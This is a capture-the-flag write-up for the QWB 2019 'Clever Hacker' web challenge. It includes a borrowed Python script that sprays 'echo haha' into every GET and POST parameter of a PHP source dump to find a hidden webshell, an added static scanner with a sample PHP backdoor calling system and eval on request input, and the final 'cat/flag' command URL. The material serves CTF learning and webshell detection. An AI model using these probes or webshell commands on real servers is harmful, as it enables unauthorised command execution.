CTF-BUUCTF-Web-[QWB (强网杯) 2019] 高明的黑客 (The Clever Hacker)


The challenge:

[screenshot 1]

Solution:

There were no other hints, so I downloaded the source directly.
[screenshot 2]
Good grief! How long would it take to read through all of that?
My guess was that I would have to write a script and then analyze the code.

[Credit to the original author; script borrowed from]:

https://blog.csdn.net/xiayu729100940/article/details/102676405

import os
import requests
import re
import time

def read_file(path, command):  # read one file and collect every request parameter it references
    with open(path, encoding="utf-8") as file:
        f = file.read()
    params = {}
    pattern = re.compile(r"(?<=\$_GET\[').*?(?='\])")  # match $_GET['name']
    for name in pattern.findall(f):
        params[name] = command

    data = {}
    pattern = re.compile(r"(?<=\$_POST\[').*?(?='\])")  # match $_POST['name']
    for name in pattern.findall(f):
        data[name] = command
    return params, data

def url_explosion(url, path, command):   # find the PHP files that actually execute the command
    params, data = read_file(path, command)
    try:
        r = requests.session().post(url, data=data, params=params)
        if r.text.find("haha") != -1:
            print(url, "\n")
            find_params(url, params, data)

    except Exception:
        print(url, "exception")

def find_params(url, params, data):   # narrow down to the single parameter that works
    try:
        for pa in params.keys():
            temp = {pa: params[pa]}
            r = requests.session().post(url, params=temp)
            if r.text.find("haha") != -1:
                print(pa)
                os.system("pause")   # Windows only: wait for a keypress before continuing

    except Exception:
        print("error!\n")
    try:
        for da in data.keys():   # iterate keys; data.items() yielded tuples and raised KeyError below
            temp = {da: data[da]}
            r = requests.session().post(url, data=temp)
            if r.text.find("haha") != -1:
                print(da)
                os.system("pause")
    except Exception:
        print("error!\n")


rootdir = "C:\\src\\"  # directory holding the downloaded PHP files
files = os.listdir(rootdir)   # renamed from `list` so the builtin is not shadowed
for i in range(0, len(files)):
    path = os.path.join(rootdir, files[i])
    name = files[i].split('-2')[0]   # get the file name
    url = "http://8d40e217-717b-4548-a15e-c131a87bdb1d.node3.buuoj.cn/" + name
    url_explosion(url, path, "echo haha")
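The borrowed script above needs a live target and fires one request per file. The "analyze the code" half of the plan can also be done offline: the dump is full of decoy `$_GET`/`$_POST` reads that go nowhere, and the real backdoor is the rare file where a request parameter reaches a code- or command-execution function. The following static triage tool is an added example (not the original post's script and not part of the challenge); it scans a dump of PHP sources for request parameters that flow, directly or through a one-hop variable alias, into `eval`, `system`, backtick execution and similar sinks, and shortlists only those files for manual review. The two PHP files are constructed samples; the regexes are a heuristic, not a PHP parser, so obfuscated flows (string concatenation, `base64_decode`, nested functions) are missed, which is why the dynamic probe remains the fallback.

```python
import re
from typing import Dict, Iterator, List, Tuple

# Functions that execute code or shell commands; attacker-controlled input reaching
# one of these is the webshell pattern we want to shortlist for manual review.
SINKS = ("eval", "assert", "system", "exec", "shell_exec", "passthru", "popen", "proc_open")

SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST)\['([^']+)'\]")
# $var = $_GET['name'];  (one-hop alias tracking only)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\$_(GET|POST|REQUEST)\['([^']+)'\]\s*;")
# sink( ... );  the argument text is inspected for tainted input
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\((.*?)\)\s*;", re.S)
BACKTICK_RE = re.compile(r"`([^`]*)`")      # `cmd` executes like shell_exec()
VARFUNC_RE = re.compile(r"\$(\w+)\s*\(")    # $fn('arg') calls whatever $fn holds
VAR_RE = re.compile(r"\$(\w+)")

Finding = Tuple[str, str, str]  # (sink, HTTP method, parameter name)


def request_params(source: str) -> List[Tuple[str, str]]:
    """Every (method, name) request parameter the file reads, live or decoy."""
    return SUPERGLOBAL_RE.findall(source)


def scan_php(source: str) -> List[Finding]:
    """Return the request parameters of one PHP file that reach an execution sink."""
    aliases: Dict[str, Tuple[str, str]] = {}
    for var, method, param in ASSIGN_RE.findall(source):
        aliases[var] = (method, param)

    def tainted(expr: str) -> Iterator[Tuple[str, str]]:
        # direct superglobal use inside the expression
        for method, param in SUPERGLOBAL_RE.findall(expr):
            yield method, param
        # variables previously assigned from a superglobal
        for var in VAR_RE.findall(expr):
            if var in aliases:
                yield aliases[var]

    findings = set()
    for sink, arg in SINK_RE.findall(source):
        for method, param in tainted(arg):
            findings.add((sink, method, param))
    for body in BACKTICK_RE.findall(source):
        for method, param in tainted(body):
            findings.add(("backtick", method, param))
    for var in VARFUNC_RE.findall(source):
        if var in aliases:
            findings.add(("variable-function",) + aliases[var])
    return sorted(findings)


def scan_dump(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan a whole source dump (file name -> contents); keep only files with findings."""
    result: Dict[str, List[Finding]] = {}
    for name, src in files.items():
        hits = scan_php(src)
        if hits:
            result[name] = hits
    return result


# Constructed sample dump: one decoy full of dead parameters, one real backdoor.
SAMPLE_DUMP = {
    "decoy.php": """<?php
$q0 = $_GET['k1']; $q1 = $_POST['k2']; $q2 = $_GET['k3'];
$unused = $_REQUEST['k4'];
echo "ok";
system("echo constant");
""",
    "backdoor.php": """<?php
$tmp = $_GET['cmd'];
if (isset($tmp)) { system($tmp); }
eval($_POST['code']);
$fn = $_GET['f']; $fn('id');
""",
}

if __name__ == "__main__":
    for name, src in SAMPLE_DUMP.items():
        print(f"{name}: {len(request_params(src))} request parameters read")
    for name, hits in scan_dump(SAMPLE_DUMP).items():
        for sink, method, param in hits:
            print(f"{name}: {method}['{param}'] reaches {sink}")
```

Run against a real dump, `scan_dump` would be fed `{fname: open(path).read() for ...}` over the extracted directory; the decoy file above reads four parameters but produces no finding, while the backdoor yields three, which is the ratio that makes static triage worthwhile before any request is sent.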

Resulting link:
http://f4cefef7-b3f2-44d5-8219-53a08291bf93.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=
[screenshot 3]

http://f4cefef7-b3f2-44d5-8219-53a08291bf93.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat/flag
[screenshot 4]
